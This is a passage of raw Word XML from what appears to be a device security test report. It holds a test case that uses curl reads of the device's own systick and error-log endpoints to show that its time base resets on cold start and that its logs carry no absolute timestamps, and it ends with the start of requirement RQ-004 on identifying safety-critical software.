            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F82AFD9" w14:textId="77777777" w:rsidR="004B3AEF"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4B3AEF" w14:paraId="2F207AE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8C0C54" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71C1B3ED" w14:textId="1D69E3A8" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="001A6A0B" w:rsidP="001A6A0B">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1603"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A6A0B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ003-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="001604A0" w14:paraId="48D27FB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C1756F8" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76702F46" w14:textId="3DE45C01" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00B95F7B"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B95F7B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-003 → CR 2.11 / CR 3.9 → Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00D67CA6" w14:paraId="15B63AD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79C5D3" w14:textId="374DCD2E" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30A71AA7" w14:textId="6E1FE04D" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00B95F7B"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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w14:paraId="3A25681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AFBBFC5" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76F8997E" w14:textId="4A87887B" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00B95F7B"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SVV-3 (Vulnerability Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="7597862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16203A" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13DF38ED" w14:textId="768B3F34" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00B779C3"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779C3">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that even the evidence the device does record cannot be placed in absolute time: the device exposes only an uptime/systick reference that resets on cold start, with no synchronised real-time clock</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B779C3">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>so interventions separated by a power cycle cannot be temporally ordered or dated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="24E767ED"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1019C5E" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5571E02A" w14:textId="77777777" w:rsidR="0040608C" w:rsidRDefault="0040608C"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0608C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Generate a loggable event; read systick/uptime and the log entry. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7D8DCA" w14:textId="24B52C51" w:rsidR="0040608C" w:rsidRDefault="0040608C"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0608C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Cold-restart. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10EFE5E5" w14:textId="77777777" w:rsidR="0040608C" w:rsidRDefault="0040608C"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0608C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Generate a second event; read systick/uptime again. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45D8B011" w14:textId="0CB182B4" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="0040608C"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0608C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Compare: show the time base reset and that no absolute timestamp is attached to either entry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00FD6890" w14:paraId="736FEA2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C8AAA37" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EB0E5E2" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="004B3AEF"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27763528" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRPr="00AF57B2" w:rsidRDefault="004B3AEF" w:rsidP="004B3AEF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE1FD7E" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="004B3AEF">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4B3AEF" w14:paraId="7CD826C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4C6D34C" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA4BC49" w14:textId="77777777" w:rsidR="004B3AEF"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4B3AEF" w14:paraId="27FD07A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541CC6" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34E09D3D" w14:textId="2BE16889" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00817CC0"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17CC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ003-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00F15AEA" w14:paraId="2E45306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11C3B82" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1935D8B9" w14:textId="77777777" w:rsidR="00163C98" w:rsidRDefault="00163C98" w:rsidP="00163C98">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163C98">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2323C4E4" w14:textId="15D690D4" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00163C98" w:rsidP="00163C98">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163C98">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pi mgmt eth1 = 192.168.50.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="1FF378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F5F9805" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75C7AE0A" w14:textId="77777777" w:rsidR="000E7106" w:rsidRPr="000E7106" w:rsidRDefault="000E7106" w:rsidP="000E7106">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E7106">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">curl to IoT-Core (/systemtime/systick, error log); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0157CA2B" w14:textId="086CB829" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="000E7106" w:rsidP="000E7106">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E7106">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §3.2 log-review method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="42462C1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A67D4B7" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B392007" w14:textId="77777777" w:rsidR="00834761" w:rsidRPr="00834761" w:rsidRDefault="0083476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34761">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ003-04 Demonstrate absence of absolute time / reset on cold start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="598EB7E9" w14:textId="77777777" w:rsidR="00834761" w:rsidRPr="00834761" w:rsidRDefault="0083476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34761">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/systemtime/systick -o TC04_tick_1.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="533239CA" w14:textId="77777777" w:rsidR="00834761" w:rsidRPr="00611347" w:rsidRDefault="0083476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611347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC04_log_1.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48DFD38C" w14:textId="77777777" w:rsidR="00834761" w:rsidRPr="00834761" w:rsidRDefault="0083476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34761">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># --- trigger a loggable event (e.g. brief SCPU/comms interruption), then COLD RESTART ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC3818B" w14:textId="77777777" w:rsidR="00834761" w:rsidRPr="00834761" w:rsidRDefault="0083476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34761">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/systemtime/systick -o TC04_tick_2.json # expect reset toward 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C584B1B" w14:textId="604D899C" w:rsidR="004B3AEF" w:rsidRPr="00611347" w:rsidRDefault="0083476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611347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC04_log_2.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="3182A6E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15592D" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630AD462" w14:textId="1A017982" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="007B389D" w:rsidP="007B389D">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7B389D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tick_2 &lt;&lt; tick_1 (counter reset); log entries carry only relative uptime, no absolute timestamp (SRIO-15218/15398</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00AD4B09" w14:paraId="0DB7CBD3"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C4A4DC0" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4995AA6C" w14:textId="017F60D6" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="007B389D"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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Time base resets, no absolute timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="170F2D0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F132848" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="271F150E" w14:textId="77777777" w:rsidR="006669AB" w:rsidRDefault="006669AB"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6669AB">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">TC04_tick_1/2.json, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A3C763E" w14:textId="77777777" w:rsidR="006669AB" w:rsidRDefault="006669AB"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6669AB">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">TC04_log_1/2.json, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CFD28B2" w14:textId="6E778529" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="006669AB"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6669AB">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>log-review note per NIST SP 800-115 §3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BE62283" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1A0D00" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B46F3A" w14:textId="77777777" w:rsidR="006669AB" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65AC10CF" w14:textId="77777777" w:rsidR="006669AB" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B28CB79" w14:textId="77777777" w:rsidR="006669AB" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7595DD23" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B28A4B" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5293B47E" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5915DE09" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4369DE04" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B5D10A" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AB9DBA" w14:textId="77777777" w:rsidR="006669AB" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3710874D" w14:textId="77777777" w:rsidR="006669AB" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D55076" w14:textId="77777777" w:rsidR="006669AB" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1805C496" w14:textId="1DB00D08" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">REQUIREMENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30536E2F"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0BB6C3B0" w14:textId="15F24AEE" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="003F4DA5" w:rsidRPr="003F4DA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7DFCC4" w14:textId="3AEB44EE" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="00897779">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F4DA5" w:rsidRPr="003F4DA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The system shall identify the software and data that are critical for compliance with the essential health and safety requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6556F67E" w14:textId="0AC4224C" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
